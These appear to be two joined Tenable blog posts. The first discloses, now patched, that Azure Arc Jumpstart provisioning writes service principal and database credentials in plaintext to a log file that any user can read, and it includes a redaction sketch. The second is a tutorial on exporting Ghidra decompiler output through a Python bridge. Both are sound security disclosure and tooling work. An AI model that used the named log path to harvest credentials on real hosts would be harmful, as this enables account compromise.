Logging Passwords in Plaintext in Azure Arc

Microsoft’s Azure Arc is a management platform designed to bridge multi-cloud and similarly mixed environments together in a convenient way.

Tenable Research has discovered that the Jumpstart environments for Arc do not properly use logging utilities common amongst other Azure services. This leads to potentially sensitive information, such as service principal credentials and Arc database credentials, being logged in plaintext. The log files that these credentials are stored in are accessible by any user on the system. Based on this finding, it may be possible that other services are also affected by a similar issue.

Microsoft has patched this issue and updated their documentation to warn users of credential reuse within the Jumpstart environment. Tenable’s advisory can be found here. No bounty was provided for this finding.

The Flaw

The testing environment this issue was discovered in is the ArcBox Fullbox Jumpstart environment. No additional configurations are necessary beyond the defaults.

When ArcBox-Client provisions during first-boot, it runs a PowerShell script that is sent to it via the Microsoft.Compute.CustomScriptExtension (version 1.10.12) plugin.

Most scripts we’ve come across on other services tend to write ***REDACTED*** in place of anything sensitive when writing to a log file. For example:

<PluginSettings>
  <Plugin name="Microsoft.CPlat.Core.RunCommandLinux" version="1.0.3">
    <RuntimeSettings seqNo="0">{
      "runtimeSettings": [
        {
          "handlerSettings": {
            "protectedSettingsCertThumbprint": "7AF139E055555FAKEINFO555558EC374DAD46370",
            "protectedSettings": "*** REDACTED ***",
            "publicSettings": {}
          }
        }
      ]
    }</RuntimeSettings>

In the provisioning script for this host, however, this sanitizing is not done. For example, in “C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.12\Status\0.status”, our secrets and credentials are plainly visible to everyone, including low privileged users.

This allows a malicious actor to disclose potentially sensitive information if they were to gain access to this machine. The accounts revealed could allow the attacker to further compromise a customer’s Azure environment if these credentials or accounts are re-used elsewhere.
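As an illustration of the sanitizing step that appears to be missing, here is a short Python sketch that masks sensitive fields before a settings object is written to a log. The list of key names is an assumption chosen for the example, and the real provisioning script is PowerShell, so treat this as a description of the idea rather than a drop-in fix.

```python
import json

# Illustrative list only; a real deployment would need its own inventory of secret fields.
SENSITIVE_KEYS = {"protectedSettings", "password", "secret", "accountKey"}
PLACEHOLDER = "*** REDACTED ***"


def redact(value):
    """Return a copy of value with sensitive keys masked, recursing into dicts and lists."""
    if isinstance(value, dict):
        return {
            key: PLACEHOLDER if key in SENSITIVE_KEYS else redact(item)
            for key, item in value.items()
        }
    if isinstance(value, list):
        return [redact(item) for item in value]
    return value


settings = {
    "runtimeSettings": [
        {"handlerSettings": {"protectedSettings": "s3cr3t", "publicSettings": {}}}
    ]
}
print(json.dumps(redact(settings), indent=2))
```

The original object is left untouched, so the script can keep using the real values while only the redacted copy reaches the status file.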

Conclusion

Obviously, the Arc Jumpstart environment is intended to be used as a demo environment, which ideally lessens the impact of the revealed credentials — provided that users haven’t reused the service principal elsewhere in their environment. That said, it isn’t uncommon for customers to use these types of Jumpstart environments as a starting point to build out their actual production infrastructure.

We also feel it’s worth being aware of this issue in case similar logging mechanisms exist elsewhere in the Azure ecosystem, where they could have more dire consequences in a production environment.


Logging Passwords in Plaintext in Azure Arc was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Extracting Ghidra Decompiler Output with Python

Ghidra’s decompiler, while not perfect, is pretty darn handy. Ghidra’s user interface, however, leaves a lot to be desired. I often find myself wishing there was a way to extract all the decompiler output to be able to explore it a bit easier in a text editor or at least run other tools against it.

At the time of this writing, there is no built-in functionality to export decompiler output from Ghidra. There are a handful of community-made scripts available that get the job done (such as Haruspex and ExportToX64dbg), but none of these tools are as flexible as I’d like. For one, Ghidra’s scripting interface is not the easiest to work with. And two, resorting to Java or the limitations of Jython just doesn’t cut it. Essentially, I want to be able to access Ghidra’s scripting engine and API while retaining the power and flexibility of a local, fully-featured Python3 environment.

This blog will walk you through setting up a Ghidra to Python bridge and running an example script to export Ghidra’s decompiler output.

Prepping Ghidra

First and foremost, make sure you have a working installation of Ghidra on your system. Official downloads can be obtained from https://ghidra-sre.org/.

Next, you’ll want to download and install the Ghidra to Python Bridge. Steps for setting up the bridge are demonstrated below, but it is recommended to follow the official installation guide in the event that the Ghidra Bridge project changes over time and breaks these instructions.

The Ghidra to Python bridge is a local Python RPC proxy that allows you to access Ghidra objects from outside the application. A word of caution here: Using this bridge is essentially allowing arbitrary code execution on your machine. Be sure to shut down the bridge when not in use.

In your preferred python environment, install the ghidra bridge:

$ pip install ghidra_bridge

Create a directory on your system to store Ghidra scripts in. In this example, we’ll create and use “~/ghidra_scripts.”

$ mkdir ~/ghidra_scripts

Launch Ghidra and create a new project. Create a Code Browser window (click the dragon icon in the tool chest bar) and open the Script Manager window. This can be opened by selecting “Window > Script Manager.” Press the “Manage Script Directories” button in the Script Manager’s toolbar.

In the window that pops up, add and enable “$USER_HOME/ghidra_scripts” to the list of script directories.

Back in your terminal or python environment, run the Ghidra Bridge installation process.

$ python -m ghidra_bridge.install_server ~/ghidra_scripts

This will automatically copy over the scripts necessary for your system to run the Ghidra Bridge.

Finally, back in Ghidra, click the “Refresh Script List” button in the toolbar and filter the results to “bridge.” Check the boxes next to “In Toolbar” for the Server Start and Server Shutdown scripts as pictured below. This will allow you to access the bridge’s start/stop commands from the Tools menu item.

Go ahead and start the bridge by selecting “Run in Background.” If all goes according to plan, you should see monitor output in the console window at the bottom of the window similar to the following:

Using the Ghidra Bridge

Now that you’ve got the full power and flexibility of Python, let’s put it to some good use. As mentioned earlier, the example use-case being provided in this blog is the export of Ghidra’s decompiler output.

Source code for this example is available here: https://github.com/tenable/ghidra_tools/tree/main/extract_decomps

We’ll be using an extremely simple application to demonstrate this script’s functionality, which is available in the “example” folder of the “extract_decomps” directory. All the application does is grab some input from the user and say hello.

Build and run the test application.

$ gcc test.c
$ ./a.out
What is your name?
# dino
Hello, dino!

Import the test binary into Ghidra and run an auto-analysis on it. Once complete, simply run the extraction script.

$ python extract.py
INFO:root:Program Name: a.out
INFO:root:Creation Date: Tue Jul 26 13:51:21 EDT 2022
INFO:root:Language ID: AARCH64:LE:64:AppleSilicon
INFO:root:Compiler Spec ID: default
INFO:root:Using 'a.out_extraction' as output directory…
INFO:root:Extracting decompiled functions…
INFO:root:Extracted 7 out of 7 functions
$ tree a.out_extraction
a.out_extraction
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

From here, you’re free to browse the source code in the text editor or IDE of your choice and run any other tools you see fit against this output. Please keep in mind, however, that the decompiler output from Ghidra is intended as pseudo code and won’t necessarily conform to the syntax expected by many static analysis tools.
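For readers curious about what such an extraction looks like through the bridge, here is a minimal sketch. It is not the extract.py from the repository linked above. It assumes the bridge server is already running inside Ghidra with a program open, and the output file naming and the function names `output_name` and `extract_all` are my own choices for illustration.

```python
import os


def output_name(func_name, entry_point):
    """Build a per-function file name; this naming pattern is an assumption."""
    return "{}@{}.c".format(func_name, entry_point)


def extract_all(out_dir, timeout_secs=60):
    """Decompile every function of the program open in Ghidra and write each to out_dir."""
    import ghidra_bridge  # imported lazily so output_name works without the bridge installed

    ns = {}
    ghidra_bridge.GhidraBridge(namespace=ns)  # loads the flat API and ghidra module into ns
    ghidra = ns["ghidra"]
    program = ns["currentProgram"]
    monitor = ghidra.util.task.ConsoleTaskMonitor()

    decomp = ghidra.app.decompiler.DecompInterface()
    decomp.openProgram(program)

    os.makedirs(out_dir, exist_ok=True)
    written = 0
    for func in program.getFunctionManager().getFunctions(True):
        result = decomp.decompileFunction(func, timeout_secs, monitor)
        if not result.decompileCompleted():
            continue  # skip functions the decompiler could not handle
        code = result.getDecompiledFunction().getC()
        name = output_name(func.getName(), func.getEntryPoint().toString())
        with open(os.path.join(out_dir, name), "w") as handle:
            handle.write(code)
        written += 1
    return written
```

Calling `extract_all("a.out_extraction")` from a local Python 3 session would then write one file per function. Every call crosses the RPC bridge, so large binaries can take a while, and the bridge's default response timeout may need raising.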


Extracting Ghidra Decompiler Output with Python was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
